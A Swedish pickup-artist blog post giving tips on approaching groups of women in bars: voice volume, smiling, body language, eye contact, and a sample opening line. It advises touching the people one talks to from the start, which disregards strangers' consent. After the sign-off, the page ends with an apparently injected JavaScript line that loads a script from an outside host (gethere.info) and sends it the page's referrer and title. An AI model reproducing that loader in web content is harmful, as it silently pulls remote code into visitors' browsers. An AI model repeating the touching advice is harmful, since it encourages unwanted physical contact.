sture2 Öppna...
Hello guys! Hoppas helgen har varit awesome!!!

Det har varit litet tomt på bloggen den senaste tiden, vilket vi får ursäkta. Alla bootcamps, seminarieförberedelser och annat har tagit upp tiden, vilket egentligen inte är någon riktig ursäkt, men det är en förklaring iaf.

Hur som helst är vi nu ”back on track”. Idag tänkte jag blogga lite om nåt riktigt basic, nämligen att öppna.

Det här är det första problemet folk har när dom börjar med det här. Jag ska i den här posten ge er en bild av att öppna och saker som man bör tänka på. För att få en klar bild måste man också titta på hela saken ur ett annat perspektiv, nämligen vad man bör undvika och vilka de vanligaste misstagen är?

So, from the top. Efter att ha hållit på med attraktion/pickup ett bra tag nu och gjort de mesta fel man kan göra och dessutom sett alla studenter och deras problem under bootcamps kan man börja markera några av dom mest grundliga grejerna som folk tenderar att glömma. Vi killar är logiska och ibland stjälper det mer än hjälper. Det jag menar är att killar tenderar att tillskriva det verbala, dvs dom faktiska orden i en öppnare en otrolig betydelse snarare än det som egentligen är det viktiga, nämligen subkommunikationen.

Vad du säger när du öppnar spelar egentlig en minimal roll! Det som spelar roll är hur du säger det. Så länge du undviker könsord, blod, kroppsvätskor, krig… Ja ni fattar. Här kommer några av dom vanligaste sakerna som folk ofta glömmer när dom ska öppna.

- Tonalitet
Volymen på din röst och hur du låter är kanske den viktigast om inte en av dom absolut viktigaste punkterna som folk tenderar till att totalt glömma bort. Tänk att ni går fram till några tjejer och försöker öppna och dom inte hör er och blir tvungna att säga ”Va?? Va säger du?”. Prata högt! Träna på att prata högt och prata tydligt. När man pratar högt subkommunicerar man självförtroende, man demonstrerar ett högt värde och kräver uppmärksamhet. Många killar som kommer in i det här har en halvbra (för att inte säga dålig) självbild och självkänsla. Det här manifesterar sig i tonaliteten: dom viskar ofta och när dom tycker att dom skriker så pratar dom lika högt som alla andra.

Går man ut på krogen är det musik och andra som pratar. För att prata med ett helt sällskap måsta man ha en stark röstprojicering. Din röstprojicering är precis som ditt kroppsspråk en manifestering av din självbild. En person som är osäker eller ska göra något som den är osäker på pratar tyst. Som en övning skulle jag säga gå på en fotbollsmatch (gärna derby), köp en ståplats på läktaren och när matchen kommer igång försök att överrösta alla i klacken. Det är otroligt värdefullt. Sen kan du dra ner lite på volymen när du är ute på klubben så du inte gör folk döva/skrämmer dom, men bara en aning. Generellt skulle jag säga det är bättre att prata för högt än att du pratar för tyst. Och efter alla bootcamps vi har gjort så har jag än inte träffat någon kille som pratar för högt, snarare tvärtom.

- Leende och energi
När man inleder en konversation med en grupp främmande människor är det väldigt viktigt att man ler och kommer in med lika hög eller lite högre energi än gruppen man pratar med. Känslor smittar av sig om du går in med lägre energi uppfattas det som att du vill ta nåt från dom ungefär: ”Här är jag, jag har inte kul…ge mej lite kul!” Men om du ler och pratar högt, dvs har en högre energi än dom uppfattas det som ”Här är jag, jag har skitkul och jag bringar glädje!”

- Chodefoot:a inte!
Jag skulle lugnt säga att 90% av alla jag ser som ska öppna i början när dom kommer in i det här har någon omedveten rörelse som dom gör. Det kan vara allt från snabba rörelser med armarna eller valsande med sina fötter när som står och pratar med en tjej, vi på CR brukar kalla det för att chodefooting, dvs att man hoppar runt med fötterna, vevar med armarna eller skakar/nickar på huvet när man öppnar.

Alla gör det här i början, det är ganska standard. När jag började med det här för ca 2 år sen berättade en kompis till mej att jag håller upp min drink med ena handen och rör runt sugröret i en ticks:ig rörelse. Jag kunde inte märka det själv, men efter att jag fick reda på det kunde jag lätt förhindra det. Som en tumregel kan du tänka på att försöka gör alla rörelser med din kropp i slow-motion. Försök vara så avslappnad så möjligt!

Plantera din fötter på marken, lägg din kroppsvikt på den bakre foten och tänk på att inte gör snabba eller ryckiga rörelser med resten av din kropp. Det här kan låta konstigt men nästan alla gör det här i början. Dock kan man lätt öva bort det med lite övning.

- Kräv uppmärksamhet
Det här är i princip det första man måste lära sig. Om man inte kan få folks uppmärksamhet och inte kräver den när man pratar med folk genom sin subkommunikation kommer man inte komma någon vart! Håll ögonkontakt med personen du pratar med och fördela din uppmärksamhet bland alla om du pratar med en grupp. Det här kan du göra väldigt enkelt genom din gestikulation, ögonkontakt, kroppsspråk, etc.

- Jaga inte!
Folk tenderar att luta sig in eller att jaga en person med sitt ansikte när dom pratar med dem. Det här kommunicerar inte bara för mycket intresse, det är även skrämmande. Tänk att en okänd människa kommer fram och börjar prata med dej och kommer väldigt nära med ansiktet, man blir rädd helt enkelt.

- Prata inte för fort!
Det här är också ett klassiskt misstag, prata inte för snabbt! Prata högt, med djup och gör pauser mellan orden och uttala det hela tydligt med positiv energi.

- Beröring
När det kommer till beröring går det i princip att skriva en bok om det hela men jag ska fatta mej kort här. Det här är det absolut viktigaste! För att det inte ska bli konstigt måste du beröra personer du pratar med FRÅN BÖRJAN!

Om du gör allt detta rätt och går fram till en grupp och, slår ut armarna med ett stort leende och säger ”Tjaaaaa” och följer upp det hela med ett konstaterande och sen en fråga kommer det att funka. Gå genom den här listan och skriv ner någon allmän fråga och en skämtsam eller positiv konstaterande så har du i princip attraktion.

Ungefär :

”Tjjaaaa”

konstaterande:
”Du/ni verkar va så coola så jag va bara tvungen att träffa er har ni övat på att va coola?”

fråga:
”Vad firar ni ikväll?”

Öva det här framför spegeln tänk på varje punkt gör detta ett par gånger. Sen övar du på detta under 4 utekvällar med 5 olika grupper under varje kväll och du kommer ha en bra öppning.

Det är inte svårare än så!

LOVE / THEMAN

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;